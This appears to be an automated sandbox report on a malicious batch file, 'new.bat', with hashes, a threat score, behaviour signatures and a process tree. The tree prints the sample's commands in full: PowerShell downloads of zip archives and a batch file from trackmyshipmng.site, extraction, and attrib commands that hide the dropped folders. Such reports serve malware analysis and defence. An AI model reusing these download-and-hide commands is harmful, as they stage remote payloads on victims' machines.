Analysis

  • max time kernel
    359s
  • max time network
    365s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    07-10-2024 19:30

General

  • Target
    new.bat
  • Size
    13.0MB
  • MD5
    fa7d31fe5607567d7240f15f27a7fd08
  • SHA1
    192e1240b664bdee1ac923c12af86d0552bd9774
  • SHA256
    830b295a70e3db6aa9e9c343bc76b59015cf1e88124efaae9713d726b6381cd2
  • SHA512
    e57ce88a41c1014189b4b4ebeda0f660cb23251fda834de5be591859b5769b6fb0b368be5634072f8083add8401abec4d92beb668263b7458571b70f94b7f4fd
  • SSDEEP
    96:q8kfEa9L03YTZEc/LsZHbwWzDI469xmnZuw1OnfnMn3BonlMS/yN+6uVF/xx6t8W:gfEa5TT0tZ8EriC

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Powershell Invoke Web Request.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\new.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2528
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9396/DX1.zip' -OutFile 'C:\Users\Admin\Downloads\DX1.zip' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2360
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DX1.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2724
    • C:\Windows\system32\timeout.exe
      timeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)
      2⤵
      • Delays execution with timeout.exe
      PID:2844
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\Downloads\Python"
      2⤵
      • Views/modifies file attributes
      PID:2600
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9396/startupppp.bat' -OutFile 'C:\Users\Admin\Downloads\startupppp.bat' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2788
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9396/F7BS.zip' -OutFile 'C:\Users\Admin\Downloads\F7BS.zip' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2768
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\F7BS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2672
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\Downloads\Print"
      2⤵
      • Views/modifies file attributes
      PID:2576

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize
    7KB
    MD5
    4c1f63bbc73a9ed7533d7c60ab6fb1aa
    SHA1
    6b0380c9161d46700cc5cf719c409a9e1192ea43
    SHA256
    a1be64ff27ce07945eef6d67eee4f2e0593d406f5dfe4e411d08d9045d11d2ae
    SHA512
    69c1c77458c5c062abba81c958ac70f7013258c83ba06a01743a56e0da797ac8f63443aa8a2fc8fb1fbf82fce833480917bbce633d34c1f158eb40240771ef0b
  • memory/2360-4-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp
    Filesize
    4KB
  • memory/2360-5-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp
    Filesize
    9.6MB
  • memory/2360-6-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp
    Filesize
    9.6MB
  • memory/2360-7-0x000000001B2B0000-0x000000001B592000-memory.dmp
    Filesize
    2.9MB
  • memory/2360-8-0x0000000002460000-0x0000000002468000-memory.dmp
    Filesize
    32KB
  • memory/2360-9-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp
    Filesize
    9.6MB
  • memory/2360-10-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp
    Filesize
    9.6MB
  • memory/2360-11-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp
    Filesize
    9.6MB
  • memory/2724-17-0x00000000023B0000-0x0000000002430000-memory.dmp
    Filesize
    512KB
  • memory/2724-19-0x00000000023A0000-0x00000000023A8000-memory.dmp
    Filesize
    32KB
  • memory/2724-18-0x000000001B180000-0x000000001B462000-memory.dmp
    Filesize
    2.9MB